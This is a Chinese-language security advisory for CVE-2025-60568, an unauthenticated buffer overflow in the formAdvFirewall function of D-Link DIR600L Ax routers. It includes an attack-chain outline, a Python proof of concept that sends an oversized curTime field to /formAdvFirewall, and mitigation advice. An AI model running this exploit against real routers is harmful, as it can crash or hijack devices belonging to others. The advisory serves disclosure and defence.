CVE-2025-60568 D-Link DIR600L Ax 路由器 formAdvFirewall 函数缓冲区溢出漏洞

漏洞信息

漏洞编号

CVE-2025-60568

漏洞类型

缓冲区溢出

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

D-Link DIR600L Ax (固件版本 FW116WWb01)

漏洞概述

CVE-2025-60568 是 D-Link DIR600L Ax 无线路由器中的一个高危安全漏洞。该漏洞存在于路由器的 Web 管理界面中，具体位于 formAdvFirewall 函数处理 curTime 参数时存在缓冲区溢出问题。攻击者可以通过构造特制的 HTTP 请求，无需任何认证即可触发此漏洞。由于该漏洞位于网络边界设备上，且无需用户交互即可被利用，因此具有极高的安全风险。成功利用此漏洞可能导致路由器服务中断（拒绝服务），甚至可能在某些情况下实现远程代码执行，从而完全控制受影响的设备。该漏洞的 CVSS 评分为 7.5，属于高危级别，对网络基础设施的安全性构成严重威胁。

技术细节

该缓冲区溢出漏洞源于 D-Link DIR600L Ax 路由器固件（版本 FW116WWb01）在处理 formAdvFirewall 函数中的 curTime 参数时缺乏适当的边界检查。当攻击者向路由器的 Web 管理接口发送包含超长字符串的 curTime 参数时，超出预期缓冲区大小的数据会覆盖相邻的内存区域。在未启用安全机制的固件版本中，这种内存溢出可能导致程序控制流被劫持或触发拒绝服务条件。由于该漏洞存在于路由器的防火墙配置功能中，攻击者可通过发送精心构造的 POST 请求到 /formAdvFirewall 端点来触发漏洞。漏洞利用不需要认证，攻击者可以直接从网络远程触发此漏洞，对路由器的稳定性造成影响。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标 D-Link DIR600L Ax 路由器的 IP 地址，并确认其运行存在漏洞的固件版本（FW116WWb01）

STEP 2

步骤2: 构造恶意请求

攻击者构造包含超长字符串的 HTTP POST 请求，目标参数为 curTime，payload 长度超过函数预期的缓冲区大小

STEP 3

步骤3: 发送漏洞利用请求

攻击者直接向路由器的 /formAdvFirewall 端点发送恶意请求，无需任何认证信息

STEP 4

步骤4: 触发缓冲区溢出

超长的 curTime 参数值被传递给 formAdvFirewall 函数，导致栈缓冲区溢出，覆盖相邻内存

STEP 5

步骤5: 漏洞利用

根据溢出数据内容和系统防护状态，可能导致路由器服务崩溃（拒绝服务）或在理想条件下实现代码执行

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
# CVE-2025-60568 PoC - D-Link DIR600L Ax Buffer Overflow in formAdvFirewall
# Target: D-Link DIR600L Ax Router (FW116WWb01)
# Vulnerability: Buffer overflow via curTime parameter

import requests
import sys

def exploit_cve_2025_60568(target_ip, target_port=80):
    """
    Exploit for CVE-2025-60568
    Sends a crafted request with oversized curTime parameter to trigger buffer overflow
    """
    # Target URL for the vulnerable formAdvFirewall endpoint
    url = f"http://{target_ip}:{target_port}/formAdvFirewall"
    
    # Buffer overflow payload - oversized curTime parameter
    # Using 1000 bytes of 'A' characters to overflow the buffer
    overflow_payload = "A" * 1000
    
    # Construct the POST data with malicious curTime parameter
    post_data = {
        "curTime": overflow_payload,
        "firewall_enable": "1"
    }
    
    try:
        print(f"[*] Sending exploit payload to {url}")
        print(f"[*] Payload size: {len(overflow_payload)} bytes")
        
        # Send the malicious request
        response = requests.post(url, data=post_data, timeout=10)
        
        print(f"[+] Request sent successfully")
        print(f"[*] Response status: {response.status_code}")
        
        return True
        
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return False

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <target_ip> [port]")
        print(f"Example: {sys.argv[0]} 192.168.0.1 80")
        sys.exit(1)
    
    target_ip = sys.argv[1]
    target_port = int(sys.argv[2]) if len(sys.argv) > 2 else 80
    
    exploit_cve_2025_60568(target_ip, target_port)

影响范围

D-Link DIR600L Ax 固件版本 FW116WWb01 及之前版本

防御指南

临时缓解措施

在官方补丁发布之前，建议采取以下临时缓解措施：1) 禁用路由器的 WAN 端 Web 管理界面，仅允许 LAN 侧访问；2) 使用 ACL 限制对路由器管理接口的访问，仅允许受信任的 IP 地址访问；3) 监控路由器日志，关注异常的 POST 请求模式；4) 考虑使用 VPN 访问路由器管理界面，避免将管理端口直接暴露在公网；5) 如果设备不再需要管理功能，考虑物理断网处理。